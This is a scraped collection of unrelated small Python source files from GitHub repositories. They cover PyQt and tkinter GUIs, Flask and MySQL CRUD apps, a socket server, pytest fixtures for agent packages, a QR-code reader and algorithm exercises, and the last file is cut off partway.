self).__init__(parent)\n self.setupUi(self)\n\n\nclass StatusApplication(QtWidgets.QMainWindow, BaseStatus.Ui_form_status):\n\n def __init__(self, parent=None):\n super(StatusApplication, self).__init__(parent)\n self.setupUi(self)\n\n\nclass DetailWindow(QtWidgets.QMainWindow, Base_Details_v004Qt5.Ui_win_details):\n\n def __init__(self, parent=None):\n super(DetailWindow, self).__init__(parent)\n self.setupUi(self)\n\nif __name__ != \"__main__\":\n mdl_ins = Modeling.ModelingControls()\n anim_ins = Animation.AnimationControls()\n rig_ins = Rigging.RiggingControls()\n shd_ins = Shading.ShadingControls()\n vfx_ins = VFX.VfxControls()\n lgt_ins = Lighting.LightingControls()\n\n CtrlObjects = {\n \"Modelling\" : mdl_ins,\n \"Animation\" : anim_ins,\n \"Rigging\" : rig_ins,\n \"Shading\" : shd_ins,\n \"Vfx\" : vfx_ins,\n \"Lighting\" : lgt_ins\n }\n\n if QtCore.QCoreApplication.instance() is not None:\n app = QtCore.QCoreApplication.instance()\n else:\n app = QtWidgets.QApplication(sys.argv)\n\n app.aboutToQuit.connect(app.quit)\n\n window = MyApplication()\n status_window = StatusApplication()\n details_window = DetailWindow()\n\n window.setWindowFlags(\n window.windowFlags() | QtCore.Qt.WindowStaysOnTopHint)\n\n details_window.setWindowFlags(\n details_window.windowFlags() | QtCore.Qt.WindowStaysOnTopHint)\n\n status_window.setWindowFlags(\n status_window.windowFlags() | QtCore.Qt.WindowStaysOnTopHint)\n\n interfaceMacho = InterfaceFunctions.InterfaceActions(\n window_interface=window, status_window=status_window,\n detail_window=details_window, ctrlObjects = CtrlObjects)\n\n window.show()\n\n try:\n sys.exit(app.exec_())\n except:\n \"\"\n","repo_name":"fidelm02/Maya_Optimizer","sub_path":"Optimizer_app.py","file_name":"Optimizer_app.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38542859166","text":"from flask import Flask, request\nimport mysql.connector\nimport json\napp = Flask(__name__)\n\nconn = mysql.connector.connect(\n host=\"mariadb\",\n user=\"root\",\n password=\"root\",\n database=\"sqoin\"\n)\n\n\n\n\n@app.route('/')\ndef hello():\n return 'Hello, World!'\n\n@app.route('/article', methods=['GET', 'POST'])\ndef article():\n print(\"get article\")\n if request.method == 'POST':\n name = request.form['name']\n cursor = conn.cursor()\n cursor.execute(\"INSERT INTO article (name) VALUES (%s)\", (name,))\n conn.commit()\n return 'Article created with name: %s' % name\n else:\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM article\")\n articles = cursor.fetchall()\n return json.dumps(articles)\n\n@app.route('/article/', methods=['GET', 'PUT', 'DELETE'])\ndef article_id(id):\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM article WHERE id=%s\", (id,))\n a = cursor.fetchone()\n if not a:\n return 'Article with id: %s not found' % id\n if request.method == 'PUT':\n name = request.form['name']\n cursor.execute(\"UPDATE article SET name=%s WHERE id=%s\", (name, id))\n conn.commit()\n return 'Article with id: %s updated' % id\n if request.method == 'DELETE':\n cursor.execute(\"DELETE FROM article WHERE id=%s\", (id,))\n conn.commit()\n return 'Article with id: %s deleted' % id\n return str(id) + ': ' + a[1]\n\nif __name__ == '__main__':\n app.run(port=8080, debug=True, host='0.0.0.0')\n\n","repo_name":"zdbrig/1hourtraining","sub_path":"python-mysql/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41797280280","text":"from tkinter import *\r\nfrom Projects.SUIGasProject.myutils import clear\r\nfrom Projects.SUIGasProject.ProjectRequirements import COLORS, FONT_STYLE, FONT_SIZE, BOLD\r\n\r\n\r\nclass LoginScreen:\r\n def __init__(self, root, frame=None, user=None, imgs=None) -> None:\r\n if frame is not None:\r\n frame.destroy()\r\n self.frame = Frame(root, bg=COLORS[\"LIGHT_BLUE\"])\r\n self.frame.pack(fill=BOTH, expand=True)\r\n\r\n txtlbl = [\"<<<\", \"login\", \"email\", \"password\", \"email\", \"password\", str(user) + '\\t' + \"LOGIN\"]\r\n self.buttons = []\r\n self.entries = []\r\n for i in range(len(txtlbl)):\r\n if i <= 1:\r\n btn = Button(self.frame, text=txtlbl[i], bg=COLORS[\"BLUE\"], fg=COLORS[\"LIGHT_BLUE\"], width=7, height=2)\r\n btn.pack()\r\n btn.place(x=(510 * i) + 5, y=(495 * i) + 5)\r\n self.buttons.append(btn)\r\n elif 1 < i < 4:\r\n lbl = Label(self.frame, text=txtlbl[i], font=(FONT_STYLE, FONT_SIZE[15], BOLD), bg=COLORS[\"LIGHT_BLUE\"],\r\n fg=COLORS[\"BLUE\"])\r\n lbl.pack()\r\n lbl.place(x=400, y=250 + (75 * (i - 1)))\r\n elif 3 < i < (len(txtlbl) - 1):\r\n entry = Entry(self.frame, width=20, font=(FONT_STYLE, FONT_SIZE[15]), bg=COLORS[\"BLUE\"])\r\n entry.insert(0, txtlbl[i])\r\n entry.pack()\r\n entry.place(x=550, y=250 + (75 * (i - 3)))\r\n entry.bind(\"\", lambda event, ent=entry: clear(event, ent))\r\n self.entries.append(entry)\r\n else:\r\n lbl = Label(self.frame, text=txtlbl[len(txtlbl) - 1], font=(FONT_STYLE, FONT_SIZE[15]),\r\n bg=COLORS[\"LIGHT_BLUE\"], fg=COLORS[\"BLUE\"])\r\n lbl.pack()\r\n lbl.place(x=450, y=100)\r\n img = [imgs[1], imgs[2]]\r\n y = 325\r\n for i in range(len(img)):\r\n lb = Label(self.frame, image=img[i], bg=COLORS[\"BLUE\"])\r\n lb.pack()\r\n lb.place(x=520, y=y)\r\n y = 400\r\n\r\n def destroy(self):\r\n self.frame.destroy()\r\n","repo_name":"pyuserAbdullah/old_sngpl","sub_path":"LoginWindow.py","file_name":"LoginWindow.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70356220945","text":"import tkinter as tk\nfrom tkinter import Menu, messagebox, ttk\nfrom pathlib import Path\nimport os\n\n\nrect_color = \"#ffcccb\"\nconfig_path = str(Path.home() / 'Documents') + r\"/RMBestFriend/Configs/\"\n\ndef center_window(window, min_width, min_height):\n # Get the screen width and height\n screen_width = window.winfo_screenwidth()\n screen_height = window.winfo_screenheight()\n\n # Calculate the x and y coordinates for centering\n x = (screen_width - min_width) // 2\n y = (screen_height - min_height) // 2\n\n # Set the window's geometry to center it on the screen\n window.geometry(f\"{min_width}x{min_height}+{x}+{y}\")\n\n\ndef save_coordinates(cor_x, cor_y, e_x, e_y):\n if not os.path.exists(config_path):\n os.makedirs(config_path)\n\n with open(config_path + r\"/coordinates.txt\", \"w\") as file:\n file.write(f\"Start X: {cor_x}\\n\")\n file.write(f\"Start Y: {cor_y}\\n\")\n file.write(f\"End X: {e_x}\\n\")\n file.write(f\"End Y: {e_y}\\n\")\n\n\ndef load_coordinates():\n try:\n with open(config_path + r\"/coordinates.txt\", \"r\") as file:\n lines = file.readlines()\n cor_x = float(lines[0].split(\":\")[1].strip())\n cor_y = float(lines[1].split(\":\")[1].strip())\n e_x = float(lines[2].split(\":\")[1].strip())\n e_y = float(lines[3].split(\":\")[1].strip())\n\n return cor_x, cor_y, e_x, e_y\n except FileNotFoundError:\n return None, None, None, None\n\n\nroot = tk.Tk()\nroot.title(\"RM Best Friend\")\nroot.attributes(\"-alpha\", 0.75)\nroot.attributes(\"-topmost\", True)\n#root.iconbitmap(\"icon.ico\")\nroot.state(\"zoomed\")\n\nframe = tk.Frame(root)\nframe.pack(side=tk.LEFT, fill=tk.Y)\n\n# Define a bold font\nbold_font = (\"Arial\", 12, \"bold\")\n\n# Create three labels\nlabel1 = tk.Label(frame, text=\"HP Detection: -\", width=15, font=bold_font, anchor=\"w\")\nlabel2 = tk.Label(frame, text=\"Buffer: -\", width=15, font=bold_font, anchor=\"w\")\nlabel3 = tk.Label(frame, text=\"GT Buffer: -\", width=15, font=bold_font, anchor=\"w\")\n\n# Pack the labels to display them in the window\nlabel1.pack(side=tk.TOP)\nlabel2.pack(side=tk.TOP)\nlabel3.pack(side=tk.TOP)\n\nmenu_bar = Menu(root)\nroot.config(menu=menu_bar)\n\nfile_menu = Menu(menu_bar, tearoff=0)\nmenu_bar.add_cascade(label=\"Menu\", menu=file_menu)\n#file_menu.add_command(label=\"Keys setup\", command=keys_setup_window)\ncanvas = tk.Canvas(root, cursor=\"cross\")\ncanvas.pack(fill=tk.BOTH, expand=True)\n\nrect = None\n\n(start_x, start_y, end_x, end_y) = load_coordinates()\n\n# canvas.bind(\"\", on_press)\n# canvas.bind(\"\", on_drag)\n# canvas.bind(\"\", on_release)\n\nif start_x:\n rect = canvas.create_rectangle(start_x,\n start_y,\n end_x,\n end_y,\n fill=rect_color)\n\nroot.mainloop()","repo_name":"ValentinN94/FlyffUHardcore","sub_path":"overlay.py","file_name":"overlay.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35961172015","text":"\"\"\"\n@version: 3.9\n@title: socket 服务端程序\n\n# 关闭客户端连接\n# 关闭一半或全部的连接。如果 how 为 SHUT_RD,则后续不再允许接收。\n# 如果 how 为 SHUT_WR,则后续不再允许发送。\n# 如果 how 为 SHUT_RDWR,则后续的发送和接收都不允许。\n\"\"\"\n\nfrom typing import Tuple\nimport socket\n\n\nclass SocketServerClient:\n \"\"\"\n socket 基础echo服务器\n \"\"\"\n\n def __init__(self, address: Tuple):\n self.address = address\n\n @classmethod\n def _base_handler(cls, client_socket):\n requestData = client_socket.recv(1024)\n if requestData:\n # 构造响应数据\n response_start_line = \"HTTP/1.1 200 OK\\r\\n\"\n response_headers = \"Server: My server\\r\\n\"\n response_body = \"

Python HTTP Test

\"\n response = response_start_line + response_headers + \"\\r\\n\" + response_body\n\n # 向客户端返回响应数据\n client_socket.send(bytes(response, \"utf-8\"))\n else:\n client_socket.shutdown(socket.SHUT_RDWR)\n client_socket.close()\n\n def serve_forever(self):\n serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n serverSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n serverSocket.bind(self.address)\n serverSocket.listen(128)\n while True:\n clientSocket, clientAddress = serverSocket.accept()\n self._base_handler(clientSocket)\n","repo_name":"qianniaoge/handbook","sub_path":"Python/scripts/server/tcp_socket_server.py","file_name":"tcp_socket_server.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12457808047","text":"import os\nimport pathlib as pl\nimport subprocess\nimport http.server\nimport socketserver\nimport threading\nimport time\n\nimport pytest\n\nfrom agent_build_refactored.utils.constants import (\n AGENT_VERSION,\n SOURCE_ROOT,\n CpuArch,\n)\nfrom agent_build_refactored.managed_packages.managed_packages_builders import (\n ALL_PACKAGE_BUILDERS,\n AGENT_AIO_PACKAGE_NAME,\n AGENT_NON_AIO_AIO_PACKAGE_NAME,\n)\nfrom tests.end_to_end_tests.managed_packages_tests.remote_machine_tests.tools import (\n create_packages_repo_root,\n get_packages_stable_version,\n is_builder_creates_aio_package,\n)\n\nfrom tests.end_to_end_tests.run_in_remote_machine import DISTROS\n\n\nIN_REMOTE_MACHINE = bool(os.environ.get(\"IN_REMOTE_MACHINE\"))\n\n\ndef add_cmd_args(parser, is_pytest_parser: bool):\n\n if is_pytest_parser:\n add_func = parser.addoption\n else:\n add_func = parser.add_argument\n\n add_func(\"--builder-name\", dest=\"builder_name\", required=True)\n\n add_func(\n \"--package-type\",\n dest=\"package_type\",\n required=True,\n choices=[\"deb\", \"rpm\"],\n help=\"Type of the package to test\",\n )\n\n add_func(\n \"--packages-source\",\n dest=\"packages_source\",\n required=False,\n help=\"Depending on the '--packages-source-type' option, directory or repo tarball with packages to test. \"\n \"If not specified, packages will be built inplace.\",\n )\n\n add_func(\n \"--packages-source-type\",\n dest=\"packages_source_type\",\n choices=[\"dir\", \"repo-tarball\"],\n default=\"dir\",\n required=False,\n )\n\n add_func(\n \"--remote-machine-type\",\n required=True,\n choices=[\"ec2\", \"docker\"],\n help=\"Type of the remote machine for the test. For 'ec2' - run in AWS ec2 instance,\"\n \"'docker' - run in docker container, 'local', run locally.\",\n )\n\n add_func(\n \"--stable-packages-version\",\n dest=\"stable_packages_version\",\n required=False,\n help=\"Version of the latest stable version of package.\",\n )\n\n add_func(\n \"--distro-name\",\n dest=\"distro_name\",\n required=True,\n choices=DISTROS.keys(),\n help=\"Distribution to test.\",\n )\n\n\ndef pytest_collection_modifyitems(config, items):\n if IN_REMOTE_MACHINE:\n return\n\n skip = pytest.mark.skip(\n reason=\"This test is only supposed to be run in a remote machine(docker or ec2)\"\n )\n for item in items:\n item.add_marker(skip)\n\n\ndef pytest_addoption(parser):\n if IN_REMOTE_MACHINE:\n add_cmd_args(parser, is_pytest_parser=True)\n\n\n@pytest.fixture(scope=\"session\")\ndef package_builder_name(request):\n \"\"\"Name of the builder that build tested packages.\"\"\"\n return request.config.option.builder_name\n\n\n@pytest.fixture(scope=\"session\")\ndef package_builder(package_builder_name):\n \"\"\"Builder class that builds tested packges.\"\"\"\n return ALL_PACKAGE_BUILDERS[package_builder_name]\n\n\n@pytest.fixture(scope=\"session\")\ndef package_type(request):\n return request.config.option.package_type\n\n\n@pytest.fixture(scope=\"session\")\ndef remote_machine_type(request):\n \"\"\"\n Fixture with time of the remote machine where tests can run. For now that's ec2 or docker.\n \"\"\"\n return request.config.option.remote_machine_type\n\n\n@pytest.fixture(scope=\"session\")\ndef distro_name(request):\n return request.config.option.distro_name\n\n\n@pytest.fixture(scope=\"session\")\ndef target_distro(distro_name):\n return DISTROS[distro_name]\n\n\n@pytest.fixture(scope=\"session\")\ndef use_aio_package(package_builder_name):\n \"\"\"Fixture flag that tells that a tested package is AIO\"\"\"\n return is_builder_creates_aio_package(package_builder_name=package_builder_name)\n\n\n@pytest.fixture(scope=\"session\")\ndef agent_package_name(use_aio_package):\n if use_aio_package:\n return AGENT_AIO_PACKAGE_NAME\n else:\n return AGENT_NON_AIO_AIO_PACKAGE_NAME\n\n\n@pytest.fixture(scope=\"session\")\ndef stable_packages_version(request):\n return get_packages_stable_version(\n version=request.config.option.stable_packages_version\n )\n\n\n@pytest.fixture(scope=\"session\")\ndef packages_repo_root(\n request, tmp_path_factory, package_builder, stable_packages_version, package_type\n):\n \"\"\"\n Root directory which is served by the mock web server.\n The mock repo is located in ./repo folder, the public key is located in ./repo_public_key.gpg\n :return:\n \"\"\"\n\n return create_packages_repo_root(\n packages_source_type=request.config.option.packages_source_type,\n packages_source=request.config.option.packages_source,\n package_builder=package_builder,\n package_type=package_type,\n stable_packages_version=stable_packages_version,\n output_dir=tmp_path_factory.mktemp(\"packages_repo_root\"),\n )\n\n\n@pytest.fixture(scope=\"session\")\ndef repo_root(packages_repo_root):\n \"\"\"Root directory of the mock repository.\"\"\"\n return packages_repo_root / \"repo\"\n\n\n@pytest.fixture(scope=\"session\")\ndef server_url(packages_repo_root):\n \"\"\"\n This fixture prepares http server with package repository and other needed files.\n \"\"\"\n\n # Create web server which serves repo and public key file.\n class Handler(http.server.SimpleHTTPRequestHandler):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, directory=str(packages_repo_root), **kwargs)\n\n with socketserver.TCPServer((\"\", 0), Handler) as httpd:\n repo_server_thread = threading.Thread(target=httpd.serve_forever)\n repo_server_thread.start()\n\n time.sleep(1)\n\n yield f\"http://localhost:{httpd.socket.getsockname()[1]}\"\n\n httpd.shutdown()\n repo_server_thread.join()\n\n\n@pytest.fixture(scope=\"session\")\ndef repo_url(server_url):\n \"\"\"Url to package repository\"\"\"\n\n return f\"{server_url}/repo\"\n\n\n@pytest.fixture(scope=\"session\")\ndef repo_public_key_url(server_url):\n return f\"{server_url}/repo_public_key.gpg\"\n\n\n@pytest.fixture(scope=\"session\")\ndef convenience_script_path(\n server_url, repo_url, repo_public_key_url, tmp_path_factory\n):\n \"\"\"\n Path to the convenience install script.\n We also start web server that serves mock repo with packages that have to be installed by the\n convenience script.\n \"\"\"\n\n # Build convenience script with current repo and public key urls.\n render_install_script_path = (\n SOURCE_ROOT\n / \"agent_build_refactored/managed_packages/convenience_install_script/render_install_agent_script.sh\"\n )\n\n install_script_path = (\n tmp_path_factory.mktemp(\"install_script\") / \"install-scalyr-agent-2.sh\"\n )\n\n subprocess.run(\n [\n \"bash\",\n str(render_install_script_path),\n repo_url,\n repo_url,\n repo_public_key_url,\n str(install_script_path),\n ],\n check=True,\n )\n\n yield install_script_path\n\n\ndef _get_package_path_from_repo(\n package_filename_glob: str, package_type: str, repo_root: pl.Path\n):\n \"\"\"Helper function that finds package inside repo root.\"\"\"\n if package_type == \"deb\":\n packages_dir = repo_root / \"pool/main/s\"\n elif package_type == \"rpm\":\n packages_dir = repo_root\n else:\n raise Exception(f\"Unknown package type: '{package_type}'\")\n\n found = list(packages_dir.rglob(package_filename_glob))\n assert len(found) == 1\n return found[0]\n\n\ndef _arch_to_package_arch(package_type: str, arch: CpuArch = None):\n if package_type == \"deb\":\n mapping = {\n CpuArch.x86_64: \"amd64\",\n CpuArch.AARCH64: \"arm64\",\n None: \"all\",\n }\n return mapping[arch]\n\n if package_type == \"rpm\":\n mapping = {\n CpuArch.x86_64: \"x86_64\",\n CpuArch.AARCH64: \"aarch64\",\n None: \"noarch\",\n }\n return mapping[arch]\n\n\n@pytest.fixture(scope=\"session\")\ndef agent_package_path(\n repo_root,\n package_builder,\n agent_package_name,\n use_aio_package,\n package_type,\n):\n if repo_root is None:\n return None\n\n if use_aio_package:\n package_arch = _arch_to_package_arch(\n package_type=package_type,\n arch=package_builder.ARCHITECTURE,\n )\n else:\n package_arch = _arch_to_package_arch(\n package_type=package_type,\n arch=None,\n )\n\n if package_type == \"deb\":\n package_filename_glob = (\n f\"{agent_package_name}_{AGENT_VERSION}_{package_arch}.{package_type}\"\n )\n elif package_type == \"rpm\":\n package_filename_glob = (\n f\"{agent_package_name}-{AGENT_VERSION}-1.{package_arch}.{package_type}\"\n )\n else:\n raise Exception(f\"Unknown package type: {package_type}\")\n\n return _get_package_path_from_repo(\n package_filename_glob=package_filename_glob,\n package_type=package_type,\n repo_root=repo_root,\n )\n","repo_name":"scalyr/scalyr-agent-2","sub_path":"tests/end_to_end_tests/managed_packages_tests/remote_machine_tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":8933,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"48"} +{"seq_id":"12307738393","text":"# tests_random.py\n# This script trys to determine the cause of errors that don't seem to be\n# contained in one module. It works with Python 3\n\nimport binpacking_dynamic as bp\nimport coolcookies\nimport mooproblem\nimport numpy as np\nimport unittest\nimport pickle\nfrom binpacking_dynamic import coordarrays\nfrom solutions_dynamic import MultiSol\n\n\n@unittest.skip('Focus on another')\nclass Tests(unittest.TestCase):\n\n def setUp(self):\n n = 1000\n cookies = coolcookies.makeobjects(n, 100, 'tests/Cookies1000.txt')\n self.moop = mooproblem.MOCookieProblem(n, 24, 300, 8, cookies)\n\n def test_coordarrays2(self):\n # Set up\n with open('tests/solution597.pkl', 'rb') as input:\n solution = pickle.load(input)\n for i in range(solution.openbins):\n print(i, solution.vlrep[i])\n coordarrays(solution)\n mooproblem.checkformismatch(solution)\n fitvals = self.moop.calcfits(solution)\n self.assertEqual(len(fitvals), 3)\n\n\nclass FixTfillLoopTests(unittest.TestCase):\n\n def setUp(self):\n n = 1000\n batchsize = 100\n boxcap = 24\n rackcap = 300\n fillcap = 8\n cookies = coolcookies.makeobjects(n, batchsize, 'tests/Cookies1000.txt')\n self.moop = mooproblem.MOCookieProblem(n, boxcap, rackcap, fillcap, cookies)\n with open('tests/solution143.pkl', 'rb') as input:\n self.solution = pickle.load(input)\n self.solution = self.check_sol_for_rack_violations(self.solution)\n\n @unittest.skip('too much output')\n def test_fix_infinite_loop_fix_tfill(self):\n violations = self.moop.period_fill_limit(self.solution)\n sol = self.moop.fix_tfill(violations, self.solution)\n self.assertEqual(sol.getopenbins(), len(sol.getvlrep()))\n rcl_tfill = self.moop.get_move_restrictions(sol)\n for tk in range(len(rcl_tfill.res_fill)):\n self.assertGreaterEqual(rcl_tfill.res_fill[tk], 0)\n\n @unittest.skip('too much output')\n def test_fix_infinite_loop_all_earlier_boxes_full(self):\n violations = self.moop.period_fill_limit(self.solution)\n rcl_tfill = self.moop.get_move_restrictions(self.solution)\n sol, rcl_tfill = self.moop.select_fix_mode(0, violations,\n rcl_tfill, self.solution)\n violations = self.moop.period_fill_limit(sol)\n sol, rcl_tfill = self.moop.open_colderbox(violations[0], rcl_tfill, sol)\n inew = sol.getopenbins() - 1\n j = sol.vlrep[inew][0]\n tmin = self.moop.cookies.get(j).getbatch() * 600\n self.assertTrue(rcl_tfill.time_feasible(sol.tfill[inew], tmin))\n\n @unittest.skip('too much output')\n def test_fix_open_colderbox(self):\n with open('tests/solution836.pkl', 'rb') as input:\n sol836 = pickle.load(input)\n sol836 = self.check_sol_for_rack_violations(sol836)\n violations = self.moop.period_fill_limit(sol836)\n rcl_tfill = self.moop.get_move_restrictions(sol836)\n for loop in range(3):\n sol836, rcl_tfill = self.moop.select_fix_mode(loop, violations,\n rcl_tfill, sol836)\n violations = self.moop.period_fill_limit(sol836)\n if violations:\n sol836, rcl_tfill = \\\n self.moop.open_colderbox(violations[0], rcl_tfill, sol836)\n rviolations = self.moop.rackcapacity(sol836.getx(), sol836.gettfill())\n self.assertListEqual(rviolations, [])\n\n @unittest.skip('too much output')\n def test_fix_infinite_loop_boxes_not_combining(self):\n with open('tests/solution555.pkl', 'rb') as input:\n sol555 = pickle.load(input)\n sol555 = self.check_sol_for_rack_violations(sol555)\n violations = self.moop.period_fill_limit(sol555)\n ran_correctly = True\n try:\n sol555 = self.moop.fix_tfill(violations, sol555)\n except KeyboardInterrupt:\n ran_correctly = False\n self.assertTrue(ran_correctly)\n\n @unittest.skip('too much output')\n def test_fix_problem_with_adapt_movebins(self):\n with open('tests/sol_14349.pkl', 'rb') as input:\n sol14349 = pickle.load(input)\n sol14349 = self.check_sol_for_rack_violations(sol14349)\n violations = self.moop.period_fill_limit(sol14349)\n self.moop.fix_tfill(violations, sol14349)\n\n @unittest.skip('too much output')\n def test_fix_no_options_at_5400(self):\n with open('tests/momasol_13263.pkl', 'rb') as input:\n sol13263 = pickle.load(input)\n sol13263 = self.check_sol_for_rack_violations(sol13263)\n violations = self.moop.period_fill_limit(sol13263)\n sol13263 = self.moop.fix_tfill(violations, sol13263)\n violations = self.moop.period_fill_limit(sol13263)\n self.assertFalse(violations)\n\n def test_fix_remove_hot_cookies(self):\n with open('tests/momasol_9931.pkl', 'rb') as input:\n sol9931 = pickle.load(input)\n sol9931 = self.check_sol_for_rack_violations(sol9931)\n\n def check_sol_for_rack_violations(self, sol):\n # sol is an instance of a solution class\n rackviolations = self.moop.rackcapacity(sol.getx(), sol.gettfill())\n # We can fix cooling rack violations:\n if rackviolations:\n self.moop.fixcoolingrack(rackviolations, sol)\n return sol\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"kyspencer/GAMMA-PC-A-Greedy-Memetic-Algorithm-for-Storing-Cooling-Objects","sub_path":"SampleScripts/tests/tests_random.py","file_name":"tests_random.py","file_ext":"py","file_size_in_byte":5458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32660036229","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\nfrom collections import defaultdict\nimport sys\nn, m = map(int, sys.stdin.readline().split())\n\narr = []\nfor _ in range(n) :\n word = sys.stdin.readline().rstrip()\n arr.append(word)\n \nfor i in range(m) :\n find = sys.stdin.readline().rstrip()\n if find not in arr :\n print(-1)\n else :\n for j in range(n) :\n if arr[j] == find :\n print(j+1, end=' ')\n print()","repo_name":"KimHyungkeun/Algorithm","sub_path":"HackerRank/ETC/Defaultdict_Tutorial.py","file_name":"Defaultdict_Tutorial.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"45383332876","text":"\"\"\" provides functions to extract, read, and compare qr codes\n\"\"\"\n\nimport numpy as np\nimport cv2\nimport pyzbar.pyzbar as pyzbar\n\n\ndef crop_qr_code(frame):\n \"\"\"crops a qr code from an image and returns it binarized\n\n :param frame: the image\n :type frame: numpy.ndarray\n :return: cropped and binarized qr code\n :rtype: numpy.ndarray\n \"\"\"\n barcode = pyzbar.decode(frame, symbols=[pyzbar.ZBarSymbol.QRCODE])\n retval = None\n if barcode:\n # gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = frame[:, :, 0]\n\n # Only check first recognized barcode\n qpoints = np.asarray(barcode[0].polygon)\n pts1 = np.float32([qpoints[0], qpoints[3], qpoints[1], qpoints[2]])\n pts2 = np.float32([[0, 0], [300, 0], [0, 300], [300, 300]])\n M = cv2.getPerspectiveTransform(pts1, pts2)\n dst = cv2.warpPerspective(gray, M, (300, 300))\n ret3, th = cv2.threshold(dst, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n retval = th\n\n return retval\n\n\ndef read_qr_code(qrcode_frame):\n \"\"\"reads a qr code image and returns its decoded information\n\n :param qrcode_frame: image of a qr code\n :return: decoded string\n :type: qrcode_frame: numpy.ndarray\n :rtype: String\n \"\"\"\n\n barcode = pyzbar.decode(qrcode_frame)\n retval = None\n\n if barcode:\n # Handle encoding errors: https://sourceforge.net/p/zbar/discussion/664596/thread/ed7aca9d/#e9bf\n try:\n retval = barcode[0].data.decode(\"ascii\")\n except UnicodeDecodeError:\n retval = barcode[0].data.decode(\"utf-8\").encode(\"sjis\").decode('utf-8')\n\n return retval\n\n\ndef qr_codes_equal(qr1, qr2):\n \"\"\"checks if two qr codes are equal\n\n :param qr1: image of first qr code\n :param qr2: image of second qr code\n :return: True if equal, False if not\n :rtype: bool\n \"\"\"\n\n if qr1 is None or qr2 is None:\n return False\n else:\n string1 = read_qr_code(qr1)\n string2 = read_qr_code(qr2)\n\n return bool(string1 and string2 and string1.strip() == string2.strip())\n","repo_name":"iswunistuttgart/ITArchSoCLib","sub_path":"lib/QRScanner.py","file_name":"QRScanner.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"29926369520","text":"# adding imports\nimport os\nimport sqlite3\nfrom flask import Flask ,request,session,g,redirect,url_for,render_template , abort,flash\n\n# constant\nSQL_FILE = 'schema.sql'\n\n# initializing app\napp = Flask(__name__)\n\n#configuration\napp.config.update(dict(\n DATABASE=os.path.join(app.root_path, 'flaskr.db'),\n DEBUG=True,\n SECRET_KEY='development key',\n USERNAME='admin',\n PASSWORD='default'\n))\napp.config.from_envvar('FLASKR_SETTINGS', silent=True)\n\n# basic endpoint\n@app.route('/')\ndef hello_world():\n return 'Hello World!'\n\ndef init_db():\n \"\"\"Initializes DB\"\"\"\n with app.app_context():\n db = get_db()\n with app.open_resource(SQL_FILE,mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\ndef connect_db():\n \"\"\"Connects to the specific database.\"\"\"\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv\n\ndef get_db():\n \"\"\"\n Opens database connection in application context if it not already exist\n \"\"\"\n if not hasattr(g,'sqlite_db'):\n g.sqlite_db = connect_db()\n else :\n return g.sqlite_db\n\n\n@app.teardown_appcontext\ndef close_db():\n \"\"\"\n Closes the database connection afte the completion of request\n \"\"\"\n if hasattr(g,'sqlite_db'):\n g.sqlite_db.close()\n\n@app.route(\"/\")\ndef show_entries():\n db = get_db()\n cur = db.execute('select title,text from entries order by id desc')\n entries = cur.fetch_all()\n return render_template('show_entries.html',entries=entries)\n\n@app.route('/add',methods=['POST'])\ndef add_entry():\n if not session.get('logged_in'):\n abort(401)\n db = get_db()\n db.execute('insert into entries(text,title) values (?,?)',[request.form['text'],request.form['title']])\n db.commit()\n flash('New entry was successfully posted')\n return redirect(url_for('show_entries'))\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"voidabhi/flask","sub_path":"Flaskr/Flaskr.py","file_name":"Flaskr.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21635905271","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 18 10:58:49 2017\n\n@author: tomislav\n\"\"\"\n\nimport cv2\n\n\ndef resize(img, scaleFactor):\n return cv2.resize(img, (int(img.shape[1]*(1/scaleFactor)),\n int(img.shape[0]*(1/scaleFactor))),\n interpolation=cv2.INTER_AREA)\n\n\ndef pyramid(image, scale=1.5, minSize=(500, 300)):\n yield image\n\n while True:\n image = resize(image, scale)\n if image.shape[0] < minSize[1] or image.shape[1] < minSize[0]:\n break\n yield image\n","repo_name":"tbazina/injection-moulding-products-detection-and-recognition","sub_path":"obj_detector/pyramid.py","file_name":"pyramid.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"798691832","text":"from django.test import TestCase, tag\nfrom game.models import Game, Board\nfrom tests.common.constants import BOARD_FIELDS_EXPECTED, FIELD_EMPTY_VAL\n\n\nclass MyTestCase(TestCase):\n @tag('enabled')\n def test_board_default_state(self):\n board = Board()\n\n field_emptiness_statuses = {\n 